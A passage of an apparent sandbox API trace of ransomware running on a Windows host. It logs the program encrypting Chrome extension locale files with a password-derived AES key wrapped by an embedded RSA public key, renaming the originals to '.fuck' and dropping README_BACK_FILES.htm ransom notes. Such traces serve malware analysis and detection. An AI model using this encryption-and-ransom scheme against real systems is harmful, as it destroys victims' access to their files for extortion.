lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0259.828] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0259.828] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0259.829] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xcb, lpOverlapped=0x0) returned 1 [0259.829] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xcb, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0259.829] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0259.830] CloseHandle (hObject=0x5d60) returned 1 [0259.830] CloseHandle (hObject=0x5d5c) returned 1 [0259.830] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json"), bFailIfExists=0) returned 1 [0259.832] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json", dwFileAttributes=0x0) returned 1 [0259.832] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json.gsg")) returned 1 [0259.833] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json.fuck")) returned 1 [0259.834] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.834] CryptDestroyKey (hKey=0x2e7c440) returned 1 [0259.834] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.834] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.834] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.835] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\readme_back_files.htm")) returned 0xffffffff [0259.835] AreFileApisANSI () returned 1 [0259.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3a48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.835] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.835] GetFileType (hFile=0x5d64) returned 0x1 [0259.835] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.836] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.836] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.837] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.837] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.837] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.837] GetLastError () returned 0x0 [0259.837] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json")) returned 0x20 [0259.837] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json", dwFileAttributes=0x80) returned 1 [0259.837] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.838] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.838] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.839] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.841] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.841] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0259.841] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.841] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c440) returned 1 [0259.841] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.841] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.841] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6d768) returned 1 [0259.841] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6d768, dwCertEncodingType=0x1, pInfo=0x2e28ab0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e28ae0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e28ae8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7ca40) returned 1 [0259.841] CryptEncrypt (in: hKey=0x2e7ca40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.841] CryptEncrypt (in: hKey=0x2e7ca40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6f1f8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6f1f8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.842] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e6f1f8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6f1f8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.842] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x28a, lpOverlapped=0x0) returned 1 [0259.849] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x28a, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x290) returned 1 [0259.849] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x290, lpOverlapped=0x0) returned 1 [0259.870] CloseHandle (hObject=0x5d5c) returned 1 [0259.870] CloseHandle (hObject=0x5d60) returned 1 [0259.870] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json"), bFailIfExists=0) returned 1 [0259.874] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json", dwFileAttributes=0x0) returned 1 [0259.874] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json.gsg")) returned 1 [0259.876] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json.fuck")) returned 1 [0259.877] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.877] CryptDestroyKey (hKey=0x2e7c440) returned 1 [0259.877] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.877] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.877] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.877] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\readme_back_files.htm")) returned 0xffffffff [0259.877] AreFileApisANSI () returned 1 [0259.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.878] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.878] GetFileType (hFile=0x5d64) returned 0x1 [0259.879] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.880] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.880] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.880] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.880] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.880] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.880] GetLastError () returned 0x0 [0259.880] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json")) returned 0x20 [0259.880] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json", dwFileAttributes=0x80) returned 1 [0259.881] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.882] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.883] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.883] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.885] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.885] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0259.886] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb468, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.886] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c440) returned 1 [0259.886] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.886] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.886] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6f0e8) returned 1 [0259.886] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6f0e8, dwCertEncodingType=0x1, pInfo=0x2e27730*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e27760*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e27768*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7ca80) returned 1 [0259.886] CryptEncrypt (in: hKey=0x2e7ca80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.886] CryptEncrypt (in: hKey=0x2e7ca80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6edb8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6edb8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.887] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e6edb8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6edb8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.888] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x315, lpOverlapped=0x0) returned 1 [0259.890] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x315, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x320) returned 1 [0259.890] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x320, lpOverlapped=0x0) returned 1 [0259.891] CloseHandle (hObject=0x5d60) returned 1 [0259.891] CloseHandle (hObject=0x5d5c) returned 1 [0259.892] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json"), bFailIfExists=0) returned 1 [0259.894] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json", dwFileAttributes=0x0) returned 1 [0259.895] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json.gsg")) returned 1 [0259.896] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 